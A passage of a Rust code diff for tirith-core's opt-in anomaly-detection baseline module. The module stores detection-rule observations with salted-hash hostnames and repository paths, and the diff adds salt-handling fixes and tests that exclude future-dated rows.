         .map(|p| p.to_string_lossy().into_owned())
@@ -287,8 +423,10 @@ pub fn hash_cwd_at(salt_file: &Path, cwd: Option<&str>) -> Option<String> {
                     .map(|p| p.display().to_string())
             })
         })?;
-    let salt = load_or_create_salt(salt_file);
-    Some(salted_hash(&salt, &resolved, 8))
+    match &*salt_state(salt_file) {
+        SaltState::Ready(salt) => Some(salted_hash(salt, &resolved, 8)),
+        SaltState::Disabled => None,
+    }
 }
 
 // ─── store I/O ─────────────────────────────────────────────────────────────--
@@ -321,10 +459,16 @@ fn parse_seen_at(s: &str) -> Option<chrono::DateTime<chrono::Utc>> {
 
 /// `true` when `seen_at` is within `WINDOW_DAYS` of `now`. An unparseable
 /// timestamp is treated as out-of-window (dropped) so a corrupt row can't
-/// inflate a count forever.
+/// inflate a count forever. A FUTURE-dated row (negative age — clock skew or a
+/// tampered store) is also dropped: without the `age_days >= 0` guard such rows
+/// would be permanently in-window and could crowd out real observations under
+/// the LRU cap.
 fn in_window(seen_at: &str, now: chrono::DateTime<chrono::Utc>) -> bool {
     match parse_seen_at(seen_at) {
-        Some(ts) => now.signed_duration_since(ts).num_days() < WINDOW_DAYS,
+        Some(ts) => {
+            let age_days = now.signed_duration_since(ts).num_days();
+            (0..WINDOW_DAYS).contains(&age_days)
+        }
         None => false,
     }
 }
@@ -550,7 +694,7 @@ pub fn reset() -> std::io::Result<usize> {
 
 /// Production host hash using the default salt path.
 pub fn hash_host(host: &str) -> Option<String> {
-    salt_path().map(|sp| hash_host_at(&sp, host))
+    hash_host_at(&salt_path()?, host)
 }
 
 /// Production cwd/repo hash using the default salt path.
@@ -712,14 +856,42 @@ mod tests {
     fn salt_is_persisted_and_stable() {
         let dir = tempdir().unwrap();
         let salt_file = salt_in(dir.path());
-        let h1 = hash_host_at(&salt_file, "github.com");
+        let h1 = hash_host_at(&salt_file, "github.com").unwrap();
         // A second call reuses the persisted salt → same hash.
-        let h2 = hash_host_at(&salt_file, "github.com");
+        let h2 = hash_host_at(&salt_file, "github.com").unwrap();
         assert_eq!(h1, h2);
         assert!(salt_file.exists(), "salt must be persisted");
         // Host hash is 16 hex chars; never the raw host.
         assert_eq!(h1.len(), 16);
         assert!(!h1.contains("github"));
+    }
+
+    #[test]
+    fn salt_file_is_32_bytes() {
+        // I2 regression: the persisted salt must be exactly 32 bytes (the
+        // documented length), not 16.
+        let dir = tempdir().unwrap();
+        let salt_file = salt_in(dir.path());
+        let _ = hash_host_at(&salt_file, "github.com").unwrap();
+        let bytes = std::fs::read(&salt_file).unwrap();
+        assert_eq!(bytes.len(), SALT_LEN);
+    }
+
+    #[test]
+    fn short_salt_file_is_regenerated() {
+        // I2 regression: a truncated/short salt file (e.g. 16 bytes from an old
+        // version or a crash mid-write) must be rejected and regenerated to the
+        // full 32 bytes, not accepted as-is.
+        let dir = tempdir().unwrap();
+        let salt_file = salt_in(dir.path());
+        std::fs::write(&salt_file, [0u8; 16]).unwrap();
+        let h = hash_host_at(&salt_file, "github.com").unwrap();
+        assert_eq!(h.len(), 16);
+        assert_eq!(
+            std::fs::read(&salt_file).unwrap().len(),
+            SALT_LEN,
+            "short salt must be regenerated to 32 bytes"
+        );
     }
 
     #[test]
@@ -736,8 +908,8 @@ mod tests {
     fn different_salts_give_different_hashes() {
         let dir1 = tempdir().unwrap();
         let dir2 = tempdir().unwrap();
-        let h1 = hash_host_at(&salt_in(dir1.path()), "github.com");
-        let h2 = hash_host_at(&salt_in(dir2.path()), "github.com");
+        let h1 = hash_host_at(&salt_in(dir1.path()), "github.com").unwrap();
+        let h2 = hash_host_at(&salt_in(dir2.path()), "github.com").unwrap();
         assert_ne!(h1, h2, "per-install salt must diverge hashes");
     }
 
@@ -752,15 +924,43 @@ mod tests {
     }
 
     #[test]
+    fn unwritable_corrupt_salt_disables_baseline() {
+        // F4 regression: when the salt is unreadable AND cannot be created
+        // (parent path is a FILE, not a dir → both read and create_dir_all
+        // fail), hashing returns None and the session is marked disabled —
+        // instead of churning a fresh per-run salt that fires
+        // AnomalyFirstTimeInThisRepo forever.
+        let dir = tempdir().unwrap();
+        // Make the salt's parent a regular file so create_dir_all/persist fail.
+        let blocker = dir.path().join("blocker");
+        std::fs::write(&blocker, b"not a dir").unwrap();
+        let salt_file = blocker.join("baseline.salt");
+
+        assert!(
+            hash_host_at(&salt_file, "github.com").is_none(),
+            "host hash must be None when the salt cannot be read or written"
+        );
+        assert!(
+            matches!(*salt_state(&salt_file), SaltState::Disabled),
+            "salt state must be Disabled for an unreadable+unwritable salt"
+        );
+    }
+
+    #[test]
     fn corrupt_line_is_skipped_not_fatal() {
         let dir = tempdir().unwrap();
         let store = store_in(dir.path());
+        // A valid, recent (in-window, NOT future-dated) observation alongside a
+        // junk line and a blank line.
+        let recent = chrono::Utc::now().to_rfc3339();
         std::fs::write(
             &store,
-            "not json\n{\"rule_id\":\"curl_pipe_shell\",\"sudo_flag\":false,\"seen_at\":\"2099-01-01T00:00:00Z\"}\n\n",
+            format!(
+                "not json\n{{\"rule_id\":\"curl_pipe_shell\",\"sudo_flag\":false,\"seen_at\":\"{recent}\"}}\n\n"
+            ),
         )
         .unwrap();
-        // The one valid (future-dated, in-window) row counts; the junk is skipped.
+        // The one valid in-window row counts; the junk is skipped.
         let k = PatternKey {
             rule_id: "curl_pipe_shell".to_string(),
             host_hash: None,
@@ -769,6 +969,34 @@ mod tests {
             cwd_repo_hash: None,
         };
         assert_eq!(lookup_at(&store, &k).count, 1);
+    }
+
+    #[test]
+    fn future_dated_observation_is_out_of_window() {
+        // Greptile P2 regression: a future-dated row (clock skew / tampered
+        // store) must NOT count as in-window forever.
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let future = (chrono::Utc::now() + chrono::Duration::days(10)).to_rfc3339();
+        std::fs::write(
+            &store,
+            format!(
+                "{{\"rule_id\":\"curl_pipe_shell\",\"sudo_flag\":false,\"seen_at\":\"{future}\"}}\n"
+            ),
+        )
+        .unwrap();
+        let k = PatternKey {
+            rule_id: "curl_pipe_shell".to_string(),
+            host_hash: None,
+            ecosystem: None,
+            sudo_flag: false,
+            cwd_repo_hash: None,
+        };
+        assert_eq!(
+            lookup_at(&store, &k).count,
+            0,
+            "a future-dated observation must be treated as out-of-window"
+        );
     }
 
     #[test]

--- a/crates/tirith-core/src/baseline.rs
+++ b/crates/tirith-core/src/baseline.rs
@@ -1,0 +1,788 @@
+//! M10 ch5 — per-user anomaly-detection baseline (design-decision **D2**).
+//!
+//! An OPT-IN sliding window of finding *observations*. When
+//! `policy.baseline_enabled` is set (default **false**), the engine records one
+//! observation every time a detection rule fires and, before recording, asks
+//! whether the observation's *pattern* has been seen before. A first-time or
+//! rarely-seen pattern surfaces an extra Info finding
+//! ([`crate::verdict::RuleId::AnomalyFirstTimeInThisRepo`] /
+//! [`AnomalyRareInBaseline`](crate::verdict::RuleId::AnomalyRareInBaseline))
+//! alongside the normal verdict. The anomaly findings are **Info** — they never
+//! change the action; they annotate "this is new for you".
+//!
+//! # Default OFF (D2)
+//!
+//! The decision recorded in `M6_TO_M14_PLAN.md` §D2 is **opt-in only**: a fresh
+//! install does nothing here. `tirith baseline learn` flips
+//! `policy.baseline_enabled` to `true`. When the flag is off, the engine never
+//! reads or writes this store on the hot path (`engine::apply_baseline` returns
+//! immediately on `!policy.baseline_enabled`), so a machine that never opted in
+//! pays nothing.
+//!
+//! # Privacy model (D2 — salted hashes, NEVER raw values)
+//!
+//! The store must be safe to read, sync, or attach to a bug report without
+//! leaking which hosts you contact or which repositories you work in.
+//! Therefore it records **no raw hostnames and no raw paths**. Specifically:
+//!
+//! * **Hostname** → `sha256(salt || host)`, hex, first 16 chars. The salt is a
+//!   per-install 32-byte random value at `state_dir()/baseline.salt` (mode
+//!   `0600`), generated on first use. Without the salt, the hashes are not
+//!   reversible via a precomputed rainbow table of common hostnames, and two
+//!   installs never produce the same hash for the same host.
+//! * **cwd / repo** → the same salted-sha256, first 8 chars, of the repository
+//!   root (the nearest `.git` ancestor of the cwd, resolved in-process by
+//!   [`crate::policy::find_repo_root`] — NOT a `git` subprocess, so the hot path
+//!   never forks). When the cwd is not inside a repo, the cwd itself is hashed.
+//! * **ecosystem** (`npm` / `pypi` / `docker` / …) and **sudo flag** are
+//!   low-cardinality, non-identifying categoricals and are stored in the clear.
+//! * **rule_id** is the public rule name, stored in the clear.
+//!
+//! The salt never leaves the machine and is never logged. The hashes are
+//! one-way; this module offers no reverse lookup.
+//!
+//! # Storage model
+//!
+//! JSONL at `state_dir()/baseline.jsonl`: one [`Observation`] object per line,
+//! appended on `record`. Two bounds keep it from growing without limit:
+//!
+//! * **Window 90 days** — observations older than [`WINDOW_DAYS`] are dropped on
+//!   the next compaction and never counted by [`lookup_at`].
+//! * **Cap 100k entries** — at [`MAX_ENTRIES`] the oldest entries are evicted
+//!   (LRU by `seen_at`). Compaction (window-prune + cap-evict) runs lazily when
+//!   the file's line count crosses a threshold on append, and unconditionally on
+//!   `reset`.
+//!
+//! If a future workload makes the linear scan a bottleneck, SQLite is the
+//! reserved backend (the `record` / `lookup` / `status` / `reset` API is the
+//! migration boundary). JSONL is chosen for v1 to stay human-inspectable.
+//!
+//! # Test entry points
+//!
+//! Every function has a `*_at(dir, …)` form that takes an explicit state
+//! directory, so tests run against a `tempfile::tempdir()` with NO writes to the
+//! real `state_dir()` and NO env mutation. The production wrappers resolve
+//! `state_dir()` and delegate.
+
+use std::io::{BufRead, BufReader, Write};
+use std::path::{Path, PathBuf};
+
+use serde::{Deserialize, Serialize};
+use sha2::{Digest, Sha256};
+
+use crate::verdict::RuleId;
+
+/// Sliding-window length. Observations older than this are pruned and never
+/// counted toward a pattern's seen-count.
+pub const WINDOW_DAYS: i64 = 90;
+
+/// Hard cap on stored observations. At this many entries the oldest are evicted
+/// (LRU by `seen_at`) so the JSONL never grows without bound.
+pub const MAX_ENTRIES: usize = 100_000;
+
+/// A pattern seen fewer than this many times in the window is "rare". A pattern
+/// seen zero times is "first time". The engine uses these to pick which anomaly
+/// rule (if any) to surface. Three matches the plan's "seen < 3 times" rule.
+pub const RARE_THRESHOLD: u32 = 3;
+
+/// Below this many total observations, `doctor` reports "early-baseline mode":
+/// the window is too sparse to trust anomaly signals (everything looks new).
+pub const EARLY_BASELINE_ENTRIES: usize = 30;
+
+/// Compact (prune-window + cap-evict) when the on-disk line count exceeds this.
+/// Slightly above [`MAX_ENTRIES`] so a steady-state store compacts occasionally
+/// rather than on every append.
+const COMPACT_TRIGGER: usize = MAX_ENTRIES + 1_000;
+
+/// One recorded observation: a detection rule firing, with the identifying
+/// fields reduced to salted hashes / low-cardinality categoricals.
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
+pub struct Observation {
+    /// The public rule name (e.g. `"curl_pipe_shell"`).
+    pub rule_id: String,
+    /// Salted-sha256 (first 16 hex chars) of the URL host, when the finding
+    /// referenced one. `None` when the finding had no host.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub host_hash: Option<String>,
+    /// Low-cardinality ecosystem label (`npm` / `pypi` / `docker` / …), in the
+    /// clear. `None` when not applicable.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub ecosystem: Option<String>,
+    /// Whether the command was a sudo invocation. Low-cardinality, in the clear.
+    pub sudo_flag: bool,
+    /// Salted-sha256 (first 8 hex chars) of the repo root (or cwd when not in a
+    /// repo). `None` when no cwd was resolvable.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub cwd_repo_hash: Option<String>,
+    /// RFC-3339 UTC timestamp the observation was recorded. Used for the
+    /// 90-day window prune and the LRU cap eviction.
+    pub seen_at: String,
+}
+
+/// The identifying tuple of an observation — everything except `seen_at`. Two
+/// observations with equal tuples are "the same pattern".
+#[derive(Debug, Clone, PartialEq, Eq, Hash)]
+pub struct PatternKey {
+    pub rule_id: String,
+    pub host_hash: Option<String>,
+    pub ecosystem: Option<String>,
+    pub sudo_flag: bool,
+    pub cwd_repo_hash: Option<String>,
+}
+
+impl PatternKey {
+    /// True when this observation carries the same identifying tuple.
+    fn matches(&self, obs: &Observation) -> bool {
+        self.rule_id == obs.rule_id
+            && self.host_hash == obs.host_hash
+            && self.ecosystem == obs.ecosystem
+            && self.sudo_flag == obs.sudo_flag
+            && self.cwd_repo_hash == obs.cwd_repo_hash
+    }
+
+    /// Build an [`Observation`] from this key, stamped now.
+    fn into_observation(self) -> Observation {
+        Observation {
+            rule_id: self.rule_id,
+            host_hash: self.host_hash,
+            ecosystem: self.ecosystem,
+            sudo_flag: self.sudo_flag,
+            cwd_repo_hash: self.cwd_repo_hash,
+            seen_at: chrono::Utc::now().to_rfc3339(),
+        }
+    }
+}
+
+/// The result of a [`lookup_at`] — how many times the pattern was seen in the
+/// window, and the classification the engine acts on.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub struct SeenCount {
+    /// Number of in-window observations matching the looked-up pattern.
+    pub count: u32,
+    /// `true` when `count == 0` (never seen in the window).
+    pub first_time: bool,
+    /// `true` when `0 < count < RARE_THRESHOLD` (seen, but rarely).
+    pub rare: bool,
+}
+
+impl SeenCount {
+    fn from_count(count: u32) -> Self {
+        Self {
+            count,
+            first_time: count == 0,
+            rare: count > 0 && count < RARE_THRESHOLD,
+        }
+    }
+}
+
+/// One row of `tirith baseline status` — a pattern and how often it appears.
+#[derive(Debug, Clone, PartialEq, Eq, Serialize)]
+pub struct TopPattern {
+    pub rule_id: String,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub host_hash: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub ecosystem: Option<String>,
+    pub sudo_flag: bool,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub cwd_repo_hash: Option<String>,
+    pub count: u32,
+}
+
+// ─── paths ───────────────────────────────────────────────────────────────────
+
+/// Default JSONL store path: `state_dir()/baseline.jsonl`.
+pub fn store_path() -> Option<PathBuf> {
+    crate::policy::state_dir().map(|d| d.join("baseline.jsonl"))
+}
+
+/// Per-install salt file path: `state_dir()/baseline.salt`.
+pub fn salt_path() -> Option<PathBuf> {
+    crate::policy::state_dir().map(|d| d.join("baseline.salt"))
+}
+
+/// The store and salt paths inside an explicit state directory (test entry).
+#[cfg(test)]
+fn store_in(dir: &Path) -> PathBuf {
+    dir.join("baseline.jsonl")
+}
+#[cfg(test)]
+fn salt_in(dir: &Path) -> PathBuf {
+    dir.join("baseline.salt")
+}
+
+// ─── salt ──────────────────────────────────────────────────────────────────--
+
+/// Load the per-install salt from `salt_path`, generating and persisting a fresh
+/// 32-byte random salt (mode `0600`) when absent. Returns the raw salt bytes.
+///
+/// On any I/O failure the call still returns a usable in-memory salt (generated
+/// fresh) so hashing never fails the hot path; a non-persisted salt only means
+/// the hashes won't be stable across processes, which is acceptable fail-open
+/// behavior (worst case: a pattern looks new once more than it should).
+fn load_or_create_salt(salt_file: &Path) -> Vec<u8> {
+    if let Ok(bytes) = std::fs::read(salt_file) {
+        if bytes.len() >= 16 {
+            return bytes;
+        }
+    }
+    // Generate a fresh 32-byte salt from the OS RNG. On the (extremely unlikely)
+    // event that the OS entropy source fails, fall back to a time-derived salt
+    // so hashing never aborts the hot path — fail-open, since a weak salt only
+    // weakens the privacy guarantee for this one process, it never crashes.
+    let mut salt = [0u8; 32];
+    if getrandom::fill(&mut salt).is_err() {
+        let nanos = std::time::SystemTime::now()
+            .duration_since(std::time::UNIX_EPOCH)
+            .map(|d| d.as_nanos())
+            .unwrap_or(0);
+        salt[..16].copy_from_slice(&nanos.to_le_bytes());
+    }
+    let salt = salt.to_vec();
+
+    // Best-effort persist at 0600. A failure here is non-fatal.
+    if let Some(parent) = salt_file.parent() {
+        let _ = std::fs::create_dir_all(parent);
+    }
+    let mut opts = std::fs::OpenOptions::new();
+    opts.create(true).write(true).truncate(true);
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::OpenOptionsExt;
+        opts.mode(0o600);
+    }
+    if let Ok(mut f) = opts.open(salt_file) {
+        let _ = f.write_all(&salt);
+    }
+    salt
+}
+
+/// Salted-sha256 of `value`, hex, truncated to `len` chars. Used for both the
+/// host hash (`len = 16`) and the cwd/repo hash (`len = 8`).
+fn salted_hash(salt: &[u8], value: &str, len: usize) -> String {
+    let mut hasher = Sha256::new();
+    hasher.update(salt);
+    hasher.update(value.as_bytes());
+    let hex = format!("{:x}", hasher.finalize());
+    hex.chars().take(len).collect()
+}
+
+/// Compute the host hash for a raw hostname using the salt in `salt_file`.
+/// Hostnames are lowercased first so `GitHub.com` and `github.com` collapse.
+pub fn hash_host_at(salt_file: &Path, host: &str) -> String {
+    let salt = load_or_create_salt(salt_file);
+    salted_hash(&salt, &host.trim().to_ascii_lowercase(), 16)
+}
+
+/// Compute the cwd/repo hash. `cwd` is resolved to its repository root (nearest
+/// `.git` ancestor) in-process; when not in a repo, the cwd path is hashed
+/// directly. Returns `None` only when no cwd is resolvable.
+pub fn hash_cwd_at(salt_file: &Path, cwd: Option<&str>) -> Option<String> {
+    let resolved = crate::policy::find_repo_root(cwd)
+        .map(|p| p.to_string_lossy().into_owned())
+        .or_else(|| {
+            cwd.map(|c| c.to_string()).or_else(|| {
+                std::env::current_dir()
+                    .ok()
+                    .map(|p| p.display().to_string())
+            })
+        })?;
+    let salt = load_or_create_salt(salt_file);
+    Some(salted_hash(&salt, &resolved, 8))
+}
+
+// ─── store I/O ─────────────────────────────────────────────────────────────--
+
+/// Parse the JSONL store, skipping blank / unparseable lines (fail-open).
+fn parse_store(path: &Path) -> Vec<Observation> {
+    let Ok(file) = std::fs::File::open(path) else {
+        return Vec::new();
+    };
+    let reader = BufReader::new(file);
+    let mut out = Vec::new();
+    for line in reader.lines().map_while(Result::ok) {
+        let trimmed = line.trim();
+        if trimmed.is_empty() {
+            continue;
+        }
+        if let Ok(obs) = serde_json::from_str::<Observation>(trimmed) {
+            out.push(obs);
+        }
+    }
+    out
+}
+
+/// Parse `seen_at` to a UTC timestamp; `None` when unparseable.
+fn parse_seen_at(s: &str) -> Option<chrono::DateTime<chrono::Utc>> {
+    chrono::DateTime::parse_from_rfc3339(s)
+        .ok()
+        .map(|dt| dt.with_timezone(&chrono::Utc))
+}
+
+/// `true` when `seen_at` is within `WINDOW_DAYS` of `now`. An unparseable
+/// timestamp is treated as out-of-window (dropped) so a corrupt row can't
+/// inflate a count forever.
+fn in_window(seen_at: &str, now: chrono::DateTime<chrono::Utc>) -> bool {
+    match parse_seen_at(seen_at) {
+        Some(ts) => now.signed_duration_since(ts).num_days() < WINDOW_DAYS,
+        None => false,
+    }
+}
+
+/// Apply the window-prune and the LRU cap to a parsed observation list.
+/// Returns the retained observations in chronological order (oldest first).
+fn compact(mut obs: Vec<Observation>, now: chrono::DateTime<chrono::Utc>) -> Vec<Observation> {
+    // 1. Window prune.
+    obs.retain(|o| in_window(&o.seen_at, now));
+    // 2. LRU cap: keep the newest MAX_ENTRIES. Sort oldest→newest by seen_at;
+    //    rows with unparseable timestamps already pruned above.
+    if obs.len() > MAX_ENTRIES {
+        obs.sort_by(|a, b| {
+            let ta = parse_seen_at(&a.seen_at);
+            let tb = parse_seen_at(&b.seen_at);
+            ta.cmp(&tb)
+        });
+        let drop_count = obs.len() - MAX_ENTRIES;
+        obs.drain(0..drop_count);
+    }
+    obs
+}
+
+/// Append `obs` to the JSONL store, creating parent dirs + the file (`0600`).
+fn append_observation(store: &Path, obs: &Observation) -> std::io::Result<()> {
+    if let Some(parent) = store.parent() {
+        std::fs::create_dir_all(parent)?;
+    }
+    let mut opts = std::fs::OpenOptions::new();
+    opts.create(true).append(true);
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::OpenOptionsExt;
+        opts.mode(0o600);
+    }
+    let mut file = opts.open(store)?;
+    let line = serde_json::to_string(obs).map_err(std::io::Error::other)?;
+    writeln!(file, "{line}")?;
+    Ok(())
+}
+
+/// Atomically rewrite the store to exactly `obs` (used by compaction + reset).
+fn rewrite_store(store: &Path, obs: &[Observation]) -> std::io::Result<()> {
+    if let Some(parent) = store.parent() {
+        std::fs::create_dir_all(parent)?;
+    }
+    let dir = store.parent().unwrap_or_else(|| Path::new("."));
+    let mut tmp = tempfile::NamedTempFile::new_in(dir)?;
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::PermissionsExt;
+        tmp.as_file()
+            .set_permissions(std::fs::Permissions::from_mode(0o600))?;
+    }
+    for o in obs {
+        let line = serde_json::to_string(o).map_err(std::io::Error::other)?;
+        writeln!(tmp, "{line}")?;
+    }
+    tmp.persist(store).map_err(|e| e.error)?;
+    Ok(())
+}
+
+/// Cheap on-disk line count (number of `\n`), used to decide whether to compact.
+fn line_count(store: &Path) -> usize {
+    let Ok(file) = std::fs::File::open(store) else {
+        return 0;
+    };
+    BufReader::new(file)
+        .lines()
+        .map_while(Result::ok)
+        .filter(|l| !l.trim().is_empty())
+        .count()
+}
+
+// ─── public API (test entry points) ──────────────────────────────────────────
+
+/// Look up how many times `key`'s pattern appears in the window of the store at
+/// `store`. A near-noop when the store is absent (one failed `open`).
+pub fn lookup_at(store: &Path, key: &PatternKey) -> SeenCount {
+    let now = chrono::Utc::now();
+    let count = parse_store(store)
+        .into_iter()
+        .filter(|o| in_window(&o.seen_at, now) && key.matches(o))
+        .count() as u32;
+    SeenCount::from_count(count)
+}
+
+/// Record `key` as a new observation in the store at `store`. Appends one line,
+/// then compacts (window-prune + cap-evict) when the line count crosses the
+/// trigger so the file stays bounded.
+pub fn record_at(store: &Path, key: PatternKey) -> std::io::Result<()> {
+    let obs = key.into_observation();
+    append_observation(store, &obs)?;
+    if line_count(store) > COMPACT_TRIGGER {
+        let now = chrono::Utc::now();
+        let compacted = compact(parse_store(store), now);
+        rewrite_store(store, &compacted)?;
+    }
+    Ok(())
+}
+
+/// Top `limit` patterns by in-window count, descending. Ties broken by rule_id
+/// then the hashes for a deterministic order.
+pub fn status_at(store: &Path, limit: usize) -> Vec<TopPattern> {
+    let now = chrono::Utc::now();
+    let mut counts: std::collections::HashMap<PatternKey, u32> = std::collections::HashMap::new();
+    for o in parse_store(store) {
+        if !in_window(&o.seen_at, now) {
+            continue;
+        }
+        let key = PatternKey {
+            rule_id: o.rule_id,
+            host_hash: o.host_hash,
+            ecosystem: o.ecosystem,
+            sudo_flag: o.sudo_flag,
+            cwd_repo_hash: o.cwd_repo_hash,
+        };
+        *counts.entry(key).or_insert(0) += 1;
+    }
+    let mut rows: Vec<TopPattern> = counts
+        .into_iter()
+        .map(|(k, count)| TopPattern {
+            rule_id: k.rule_id,
+            host_hash: k.host_hash,
+            ecosystem: k.ecosystem,
+            sudo_flag: k.sudo_flag,
+            cwd_repo_hash: k.cwd_repo_hash,
+            count,
+        })
+        .collect();
+    rows.sort_by(|a, b| {
+        b.count
+            .cmp(&a.count)
+            .then_with(|| a.rule_id.cmp(&b.rule_id))
+            .then_with(|| a.host_hash.cmp(&b.host_hash))
+            .then_with(|| a.ecosystem.cmp(&b.ecosystem))
+            .then_with(|| a.sudo_flag.cmp(&b.sudo_flag))
+            .then_with(|| a.cwd_repo_hash.cmp(&b.cwd_repo_hash))
+    });
+    rows.truncate(limit);
+    rows
+}
+
+/// Total in-window observation count for the store at `store`. Drives the
+/// `doctor` early-baseline-mode threshold.
+pub fn entry_count_at(store: &Path) -> usize {
+    let now = chrono::Utc::now();
+    parse_store(store)
+        .into_iter()
+        .filter(|o| in_window(&o.seen_at, now))
+        .count()
+}
+
+/// Zero the store at `store` by removing the JSONL file. The salt is left in
+/// place (re-using it keeps existing-but-cleared hashes stable; removing it
+/// would only churn the salt for no privacy gain). Returns the number of
+/// entries removed.
+pub fn reset_at(store: &Path) -> std::io::Result<usize> {
+    let removed = line_count(store);
+    match std::fs::remove_file(store) {
+        Ok(()) => Ok(removed),
+        Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(0),
+        Err(e) => Err(e),
+    }
+}
+
+// ─── production wrappers ──────────────────────────────────────────────────────
+
+/// `true` when the default store exists and has at least one byte. The engine's
+/// tier-1 force-past consults this so a baseline-enabled-but-empty store still
+/// reaches the record path (so the FIRST observation can be the first-time one).
+pub fn store_nonempty() -> bool {
+    store_path()
+        .map(|p| std::fs::metadata(&p).map(|m| m.len() > 0).unwrap_or(false))
+        .unwrap_or(false)
+}
+
+/// Production lookup against the default store.
+pub fn lookup(key: &PatternKey) -> SeenCount {
+    match store_path() {
+        Some(p) => lookup_at(&p, key),
+        None => SeenCount::from_count(0),
+    }
+}
+
+/// Production record against the default store.
+pub fn record(key: PatternKey) -> std::io::Result<()> {
+    let store = store_path().ok_or_else(|| {
+        std::io::Error::new(
+            std::io::ErrorKind::NotFound,
+            "cannot determine tirith state directory",
+        )
+    })?;
+    record_at(&store, key)
+}
+
+/// Production top-N status against the default store.
+pub fn status(limit: usize) -> Vec<TopPattern> {
+    match store_path() {
+        Some(p) => status_at(&p, limit),
+        None => Vec::new(),
+    }
+}
+
+/// Production in-window entry count against the default store.
+pub fn entry_count() -> usize {
+    match store_path() {
+        Some(p) => entry_count_at(&p),
+        None => 0,
+    }
+}
+
+/// Production reset against the default store.
+pub fn reset() -> std::io::Result<usize> {
+    let store = store_path().ok_or_else(|| {
+        std::io::Error::new(
+            std::io::ErrorKind::NotFound,
+            "cannot determine tirith state directory",
+        )
+    })?;
+    reset_at(&store)
+}
+
+/// Production host hash using the default salt path.
+pub fn hash_host(host: &str) -> Option<String> {
+    salt_path().map(|sp| hash_host_at(&sp, host))
+}
+
+/// Production cwd/repo hash using the default salt path.
+pub fn hash_cwd(cwd: Option<&str>) -> Option<String> {
+    let sp = salt_path()?;
+    hash_cwd_at(&sp, cwd)
+}
+
+/// The anomaly rule a [`SeenCount`] maps to, if any. `None` when the pattern is
+/// common enough that no anomaly finding is warranted.
+pub fn anomaly_rule(seen: SeenCount) -> Option<RuleId> {
+    if seen.first_time {
+        Some(RuleId::AnomalyFirstTimeInThisRepo)
+    } else if seen.rare {
+        Some(RuleId::AnomalyRareInBaseline)
+    } else {
+        None
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use tempfile::tempdir;
+
+    fn key(rule: &str) -> PatternKey {
+        PatternKey {
+            rule_id: rule.to_string(),
+            host_hash: Some("abc123".to_string()),
+            ecosystem: None,
+            sudo_flag: false,
+            cwd_repo_hash: Some("deadbeef".to_string()),
+        }
+    }
+
+    #[test]
+    fn first_observation_is_first_time() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let k = key("curl_pipe_shell");
+        let seen = lookup_at(&store, &k);
+        assert_eq!(seen.count, 0);
+        assert!(seen.first_time);
+        assert!(!seen.rare);
+        assert_eq!(anomaly_rule(seen), Some(RuleId::AnomalyFirstTimeInThisRepo));
+    }
+
+    #[test]
+    fn recorded_three_times_is_not_anomalous() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let k = key("curl_pipe_shell");
+        for _ in 0..3 {
+            record_at(&store, k.clone()).unwrap();
+        }
+        let seen = lookup_at(&store, &k);
+        assert_eq!(seen.count, 3);
+        assert!(!seen.first_time);
+        assert!(!seen.rare, "3 >= RARE_THRESHOLD, not rare");
+        assert_eq!(anomaly_rule(seen), None);
+    }
+
+    #[test]
+    fn recorded_once_is_rare() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let k = key("curl_pipe_shell");
+        record_at(&store, k.clone()).unwrap();
+        let seen = lookup_at(&store, &k);
+        assert_eq!(seen.count, 1);
+        assert!(!seen.first_time);
+        assert!(seen.rare);
+        assert_eq!(anomaly_rule(seen), Some(RuleId::AnomalyRareInBaseline));
+    }
+
+    #[test]
+    fn distinct_tuples_counted_separately() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let mut k2 = key("curl_pipe_shell");
+        k2.sudo_flag = true; // different tuple
+        record_at(&store, key("curl_pipe_shell")).unwrap();
+        record_at(&store, key("curl_pipe_shell")).unwrap();
+        record_at(&store, k2.clone()).unwrap();
+
+        assert_eq!(lookup_at(&store, &key("curl_pipe_shell")).count, 2);
+        assert_eq!(lookup_at(&store, &k2).count, 1);
+    }
+
+    #[test]
+    fn out_of_window_observations_are_not_counted() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        // Write one old (out-of-window) and one recent observation by hand.
+        let old = Observation {
+            rule_id: "curl_pipe_shell".to_string(),
+            host_hash: Some("abc123".to_string()),
+            ecosystem: None,
+            sudo_flag: false,
+            cwd_repo_hash: Some("deadbeef".to_string()),
+            seen_at: (chrono::Utc::now() - chrono::Duration::days(WINDOW_DAYS + 5)).to_rfc3339(),
+        };
+        rewrite_store(&store, &[old]).unwrap();
+        // The old one is out of window → first time again.
+        let seen = lookup_at(&store, &key("curl_pipe_shell"));
+        assert_eq!(seen.count, 0);
+        assert!(seen.first_time);
+    }
+
+    #[test]
+    fn status_orders_by_count_desc() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        record_at(&store, key("rule_a")).unwrap();
+        record_at(&store, key("rule_b")).unwrap();
+        record_at(&store, key("rule_b")).unwrap();
+        record_at(&store, key("rule_b")).unwrap();
+
+        let top = status_at(&store, 20);
+        assert_eq!(top.len(), 2);
+        assert_eq!(top[0].rule_id, "rule_b");
+        assert_eq!(top[0].count, 3);
+        assert_eq!(top[1].rule_id, "rule_a");
+        assert_eq!(top[1].count, 1);
+    }
+
+    #[test]
+    fn status_respects_limit() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        for i in 0..5 {
+            record_at(&store, key(&format!("rule_{i}"))).unwrap();
+        }
+        assert_eq!(status_at(&store, 3).len(), 3);
+    }
+
+    #[test]
+    fn reset_zeroes_the_store() {
